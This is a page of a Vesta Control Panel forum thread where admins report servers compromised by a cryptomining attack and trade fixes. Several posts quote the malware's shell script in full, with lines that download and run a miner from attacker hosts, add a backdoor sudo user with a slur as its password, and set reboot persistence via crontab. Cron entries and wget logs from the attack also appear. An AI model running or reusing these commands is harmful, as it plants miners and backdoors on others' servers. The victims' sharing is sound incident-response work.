Vesta Control Panel - Forum

Community Forum
https://forum.vestacp.com/

have been HACKED ! by xaxaxa.eu

https://forum.vestacp.com/viewtopic.php?t=17183

Page 3 of 5

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 8:13 am
by ScIT
aximus wrote: Tue Jun 26, 2018 8:11 am
ScIT wrote: Tue Jun 26, 2018 7:29 am
did you tried to upgrade like i wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.
I did exactly as you wrote.

Code: Select all

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  20   amd64  no    2018-04-09
vesta-php    0.9.8  19   amd64  no    2018-01-23
vesta-nginx  0.9.8  20   amd64  no    2018-04-09
I don't mean to hijack the topic. But if I'm not receiving updates then of course my server will be targeted.
please open another thread for this issue.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 8:15 am
by ScIT
jonny1960 wrote: Tue Jun 26, 2018 8:07 am also was hacked tonight by mining virus
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Because I still have not get any informations from other users: Was your system infected with installed patch or without? Actual patch is 0.9.8-22 and fixes the security issue.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 9:20 am
by aximus
ScIT wrote: Tue Jun 26, 2018 8:13 am please open another thread for this issue - with release 20 you should be also save for now.
As a last reply; I have fixed the issue by adding the right repositories to apt:

Code: Select all

CHOST='c.vestacp.com'
RHOST='apt.vestacp.com'
codename="$(lsb_release -s -c)"
apt=/etc/apt/sources.list.d

echo "deb http://$RHOST/$codename/ $codename vesta" > $apt/vesta.list
wget $CHOST/deb_signing.key -O deb_signing.key
apt-key add deb_signing.key

echo "deb http://nginx.org/packages/mainline/ubuntu/ $codename nginx" > $apt/nginx.list
wget http://nginx.org/keys/nginx_signing.key -O /tmp/nginx_signing.key
apt-key add /tmp/nginx_signing.key

apt-get update && apt-get upgrade -y
This is normally done when installing Vesta, but somehow it got lost for my installation.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 9:21 am
by ScIT
aximus wrote: Tue Jun 26, 2018 9:20 am
ScIT wrote: Tue Jun 26, 2018 8:13 am please open another thread for this issue - with release 20 you should be also save for now.
As a last reply; I have fixed the issue by adding the right repositories to apt:

Code: Select all

CHOST='c.vestacp.com'
RHOST='apt.vestacp.com'
codename="$(lsb_release -s -c)"
apt=/etc/apt/sources.list.d

echo "deb http://$RHOST/$codename/ $codename vesta" > $apt/vesta.list
wget $CHOST/deb_signing.key -O deb_signing.key
apt-key add deb_signing.key

echo "deb http://nginx.org/packages/mainline/ubuntu/ $codename nginx" > $apt/nginx.list
wget http://nginx.org/keys/nginx_signing.key -O /tmp/nginx_signing.key
apt-key add /tmp/nginx_signing.key

apt-get update && apt-get upgrade -y
This is normally done when installing Vesta, but somehow it got lost for my installation.
Glad that you found the solution by your own!

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 9:23 am
by jonny1960
ScIT wrote: Tue Jun 26, 2018 8:15 am Because I still have not get any informations from other users: Was your system infected with installed patch or without? Actual patch is 0.9.8-22 and fixes the security issue.
hacking happened on version 21, after update to 22 and remove of the virus the issue has stopped.

but now i have problem with file_get_contents() it does not work and does not send a request. zero response comes to fast. but curl_init() works.

Do you have an idea of what the problem may be?

file_get_contents(): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 10:36 am
by Llorca
in Vesta CRON!!!!


wget -O /tmp/load.sh http://bigbatman.loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >>
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod x /tmp/load.sh; /tmp/load.sh >> /tmp/out.log

u must delete and Update.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 10:51 am
by ScIT
jonny1960 wrote: Tue Jun 26, 2018 9:23 am
ScIT wrote: Tue Jun 26, 2018 8:15 am Because I still have not get any informations from other users: Was your system infected with installed patch or without? Actual patch is 0.9.8-22 and fixes the security issue.
hacking happened on version 21, after update to 22 and remove of the virus the issue has stopped.

but now i have problem with file_get_contents() it does not work and does not send a request. zero response comes to fast. but curl_init() works.

Do you have an idea of what the problem may be?

file_get_contents(): failed to open stream: php_network_getaddresses: getaddrinfo failed: System error
Please open a own topic for this issue.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 10:53 am
by ScIT
Llorca wrote: Tue Jun 26, 2018 10:36 am in Vesta CRON!!!!


wget -O /tmp/load.sh http://bigbatman.loan/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >>
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log
wget -O /tmp/load.sh http://xaxaxa.eu/load.sh; chmod x /tmp/load.sh; /tmp/load.sh >> /tmp/out.log

u must delete and Update.
I don't think that this alone will solve the issue. As already written, the update does NOT remove malware, it fixes the security issue. In my point of view: Never trust a hacked server, you don't know what happened exactly and what the hacker (or script) have done with it. Best and save way would be to reinstall the server and migrate the user content.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 12:43 pm
by delfo2000
Hi,

tonight haker fuck me.

Code: Select all

if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    wget -O /tmp/gcc http://xaxaxa.eu/gcc;
    chmod +x gcc;
    wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Ok, I restored 2 day ago snapshoot and update last vesta

Code: Select all

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-22
vesta-nginx  0.9.8  21   amd64  yes   2018-05-22
I closed port 8083 my firewall, I think is bad use default public vesta port, but change port don't solve vestacp bug, hacker use login page.

Before update I used 0.9.8 20

Vestacp send me e-mail:

Code: Select all

--2018-06-26 01:34:01--  http://xaxaxa.eu/load.sh Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: ‘/tmp/load.sh’

     0K                                                       100%  116M=0s

2018-06-26 01:34:02 (116 MB/s) - ‘/tmp/load.sh’ saved [605/605]

chmod: invalid mode: ‘x’
Try 'chmod --help' for more information.
--2018-06-26 01:34:02--  http://xaxaxa.eu/gcc Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1256576 (1.2M) [text/plain]
Saving to: ‘/tmp/gcc’

     0K .......... .......... .......... .......... ..........  4%  168K 7s
    50K .......... .......... .......... .......... ..........  8%  187K 6s
   100K .......... .......... .......... .......... .......... 12%  269K 5s
   150K .......... .......... .......... .......... .......... 16%  323K 5s
   200K .......... .......... .......... .......... .......... 20%  320K 4s
   250K .......... .......... .......... .......... .......... 24%  221K 4s
   300K .......... .......... .......... .......... .......... 28% 80.1K 5s
   350K .......... .......... .......... .......... .......... 32%  144K 5s
   400K .......... .......... .......... .......... .......... 36%  210K 4s
   450K .......... .......... .......... .......... .......... 40%  281K 4s
   500K .......... .......... .......... .......... .......... 44%  286K 4s
   550K .......... .......... .......... .......... .......... 48%  325K 3s
   600K .......... .......... .......... .......... .......... 52%  436K 3s
   650K .......... .......... .......... .......... .......... 57%  389K 2s
   700K .......... .......... .......... .......... .......... 61%  446K 2s
   750K .......... .......... .......... .......... .......... 65%  431K 2s
   800K .......... .......... .......... .......... .......... 69%  470K 2s
   850K .......... .......... .......... .......... .......... 73%  426K 1s
   900K .......... .......... .......... .......... .......... 77%  399K 1s
   950K .......... .......... .......... .......... .......... 81%  407K 1s
  1000K .......... .......... .......... .......... .......... 85%  409K 1s
  1050K .......... .......... .......... .......... .......... 89%  164K 1s
  1100K .......... .......... .......... .......... .......... 93% 79.7M 0s
  1150K .......... .......... .......... .......... .......... 97%  861K 0s
  1200K .......... .......... .......                         100%  348K=4.5s

2018-06-26 01:34:07 (272 KB/s) - ‘/tmp/gcc’ saved [1256576/1256576]

chmod: cannot access ‘gcc’: No such file or directory
--2018-06-26 01:34:07--  http://xaxaxa.eu/config_1.json Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 681 [application/json]
Saving to: ‘/tmp/config_1.json’

     0K                                                       100% 49.5M=0s

2018-06-26 01:34:07 (49.5 MB/s) - ‘/tmp/config_1.json’ saved [681/681]

[sudo] password for admin: useradd: user 'sysroot' already exists
/tmp/load.sh: line 13: /tmp/gcc: Permission denied
/tmp/load.sh: line 15: /usr/local/vesta/bin/v-update-sys-vesta-all: Permission denied

Code: Select all

--2018-06-26 01:34:01--  http://xaxaxa.eu/load.sh Resolving xaxaxa.eu (xaxaxa.eu)... 198.251.90.113 Connecting to xaxaxa.eu (xaxaxa.eu)|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: ‘/tmp/load.sh’

     0K                                                       100% 48.2M=0s

2018-06-26 01:34:02 (48.2 MB/s) - ‘/tmp/load.sh’ saved [605/605]

/bin/sh: /tmp/load.sh: Text file busy

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 1:21 pm
by Spheerys
I have post a kick and dirty tutorial to remove which I have found : viewtopic.php?p=71564#p71564
In my case, and the time to move the hosted websites on a new server, it's solve the issue.
All times are UTC
Page 3 of 5

Powered by phpBB® Forum Software © phpBB Limited